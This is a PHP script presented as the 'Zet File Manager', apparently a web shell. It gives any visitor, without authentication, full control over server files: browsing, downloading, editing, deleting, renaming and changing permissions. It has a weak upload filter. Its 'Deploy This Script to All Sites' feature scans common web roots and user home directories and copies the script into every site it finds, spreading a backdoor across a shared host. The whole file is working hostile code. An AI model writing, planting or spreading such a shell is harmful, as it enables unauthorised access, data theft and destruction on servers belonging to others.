﻿<?php
// 🛠️ Zet File Manager + Auto Deploy (Final Version)
ini_set('display_errors', 1);
error_reporting(E_ALL);

// Base paths to scan
$scanRoots = [
    '/var/www',
    '/srv/http',
    '/home',
    '/usr/local/www',
    '/opt/lampp/htdocs'
];
$excludedDirs = ['cgi-bin', 'wp-admin', 'wp-includes', 'wp-content', 'logs'];

// Detect deployable web roots
function findWebRoots($roots) {
    global $excludedDirs;
    $webDirs = [];

    foreach ($roots as $base) {
        if (!is_dir($base)) continue;

        $entries = scandir($base);
        foreach ($entries as $entry) {
            if ($entry === '.' || $entry === '..') continue;
            $userPath = realpath("$base/$entry");
            if (!is_dir($userPath)) continue;

            // Detect /home/user/public_html/* structure
            foreach (['public_html', 'www', 'htdocs'] as $subdir) {
                $webRoot = "$userPath/$subdir";
                if (is_dir($webRoot)) {
                    $webDirs[] = $webRoot;

                    foreach (scandir($webRoot) as $subsite) {
                        if (in_array($subsite, ['.', '..']) || in_array($subsite, $excludedDirs)) continue;
                        $sitePath = realpath("$webRoot/$subsite");
                        if (is_dir($sitePath)) {
                            $webDirs[] = $sitePath;
                        }
                    }
                }
            }

            // Direct subfolder deploy (e.g. /var/www/site)
            if (preg_match('~^/(var|srv|opt)/~', $base)) {
                if (!in_array($entry, $excludedDirs)) {
                    $webDirs[] = $userPath;
                }
            }
        }
    }

    return array_unique($webDirs);
}

// Detected site paths
$availableRoots = findWebRoots($scanRoots);
$currentPath = realpath($_GET['p'] ?? getcwd()) ?: getcwd();

// Deploy script to all sites on button click, show results hidden by default
if (isset($_GET['deploy']) && $_GET['deploy'] === 'now') {
    $self = __FILE__;
    $basename = basename($self);
    $results = "<h3 style='color:lime'>✅ Deploy Results:</h3><ul>";

    foreach ($availableRoots as $sitePath) {
        $target = rtrim($sitePath, '/') . '/' . $basename;

        if (file_exists($target)) {
            if (@copy($self, $target)) {
                $results .= "<li>🔁 Replaced: <code>$target</code></li>";
            } else {
                $results .= "<li style='color:red'>❌ Failed to overwrite: <code>$target</code></li>";
            }
        } else {
            if (@copy($self, $target)) {
                $results .= "<li>✔️ Deployed: <code>$target</code></li>";
            } else {
                $results .= "<li style='color:red'>❌ Failed to copy: <code>$target</code></li>";
            }
        }
    }
    $results .= "</ul><hr>";

    echo <<<HTML
    <button onclick="document.getElementById('deployResults').style.display='block'; this.style.display='none';" style="background:#282; color:white; padding:5px 10px; border:none;">Show Deploy Results</button>
    <div id="deployResults" style="display:none;">$results</div>
    HTML;
}

// Helpers
function perms($file) {
    return substr(sprintf('%o', fileperms($file)), -4);
}
function formatSize($bytes) {
    $units = ['B', 'KB', 'MB', 'GB'];
    for ($i = 0; $bytes >= 1024 && $i < count($units) - 1; $i++) $bytes /= 1024;
    return round($bytes, 1) . " " . $units[$i];
}
function sanitizeUpload($filename) {
    return preg_replace('/\.php$/i', '.safe', basename($filename));
}

// Upload files
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    foreach ($_FILES['file']['name'] as $i => $name) {
        $safe = sanitizeUpload($name);
        move_uploaded_file($_FILES['file']['tmp_name'][$i], "$currentPath/$safe");
    }
    header("Location: ?p=" . urlencode($currentPath));
    exit;
}

// Edit file
if (isset($_POST['editfile'], $_POST['content'])) {
    file_put_contents($_POST['editfile'], $_POST['content']);
    header("Location: ?p=" . urlencode(dirname($_POST['editfile'])));
    exit;
}

// Delete file
if (isset($_GET['delete'])) {
    $target = realpath($_GET['delete']);
    if (is_file($target)) unlink($target);
    header("Location: ?p=" . urlencode(dirname($target)));
    exit;
}

// Rename file
if (isset($_POST['oldname'], $_POST['newname'])) {
    rename($_POST['oldname'], dirname($_POST['oldname']) . '/' . basename($_POST['newname']));
    header("Location: ?p=" . urlencode(dirname($_POST['oldname'])));
    exit;
}

// Change file permissions
if (isset($_POST['chmod'], $_POST['file'])) {
    chmod($_POST['file'], octdec($_POST['chmod']));
    header("Location: ?p=" . urlencode(dirname($_POST['file'])));
    exit;
}

// Download file
if (isset($_GET['download'])) {
    $file = realpath($_GET['download']);
    if (is_file($file)) {
        header("Content-Type: application/octet-stream");
        header("Content-Disposition: attachment; filename=\"" . basename($file) . "\"");
        readfile($file);
        exit;
    }
}

// Scan current directory
$items = scandir($currentPath);

?>
<!DOCTYPE html>
<html>
<head>
    <title>Zet File Manager</title>
    <meta charset="utf-8">
    <style>
        body { background: #111; color: #eee; font-family: monospace; padding: 20px; }
        a { color: #7df; text-decoration: none; }
        table { width: 100%; border-collapse: collapse; }
        td, th { padding: 6px 10px; border-bottom: 1px solid #333; }
        input[type=text] { background: #222; color: #fff; border: 1px solid #555; padding: 3px; }
        textarea { width: 100%; height: 400px; background: #000; color: #0f0; font-family: monospace; }
        button { padding: 5px 10px; margin-top: 5px; background: #333; color: #fff; border: 1px solid #555; cursor: pointer; }
    </style>
</head>
<body>

<h2>🗂️ Zet File Manager</h2>
<div>📍 Path: <b><?= htmlspecialchars($currentPath) ?></b></div>

<h3>📂 Auto Deploy: Detected Sites</h3>
<ul>
<?php foreach ($availableRoots as $root): ?>
    <li><a href="?p=<?= urlencode($root) ?>"><?= htmlspecialchars($root) ?></a></li>
<?php endforeach; ?>
</ul>

<form method="get" style="margin-top:10px;">
    <input type="hidden" name="deploy" value="now">
    <button type="submit">🚀 Deploy This Script to All Sites</button>
</form>

<!-- Upload form -->
<form method="post" enctype="multipart/form-data">
    <input type="file" name="file[]" multiple>
    <button type="submit">Upload</button>
</form>

<!-- File list -->
<table>
    <tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr>
    <?php foreach ($items as $item):
        if (in_array($item, ['.', '..']) || in_array($item, $excludedDirs)) continue;
        $full = "$currentPath/$item";
        $isDir = is_dir($full);
    ?>
    <tr>
        <td><?= $isDir ? "📁" : "📄" ?>
            <?= $isDir ? "<a href='?p=" . urlencode($full) . "'>" . htmlspecialchars($item) . "</a>" : htmlspecialchars($item) ?>
        </td>
        <td><?= $isDir ? '-' : formatSize(filesize($full)) ?></td>
        <td><?= perms($full) ?></td>
        <td>
            <?php if (!$isDir): ?>
                <a href="?download=<?= urlencode($full) ?>">Download</a> |
                <a href="?edit=<?= urlencode($full) ?>">Edit</a> |
                <form method="post" style="display:inline">
                    <input type="hidden" name="oldname" value="<?= htmlspecialchars($full) ?>">
                    <input type="text" name="newname" value="<?= htmlspecialchars($item) ?>">
                    <button>Rename</button>
                </form> |
                <a href="?delete=<?= urlencode($full) ?>" onclick="return confirm('Delete?')">Delete</a>
            <?php endif; ?>
            <form method="post" style="display:inline">
                <input type="hidden" name="file" value="<?= htmlspecialchars($full) ?>">
                <input type="text" name="chmod" placeholder="0755" size="4">
                <button>Chmod</button>
            </form>
        </td>
    </tr>
    <?php endforeach; ?>
</table>

<!-- Edit file -->
<?php if (isset($_GET['edit']) && is_file($_GET['edit'])):
    $f = $_GET['edit'];
    $c = htmlspecialchars(file_get_contents($f));
?>
<h3>✏️ Editing <?= basename($f) ?></h3>
<form method="post">
    <input type="hidden" name="editfile" value="<?= htmlspecialchars($f) ?>">
    <textarea name="content"><?= $c ?></textarea>
    <button>Save</button>
</form>
<?php endif; ?>

</body>
</html>
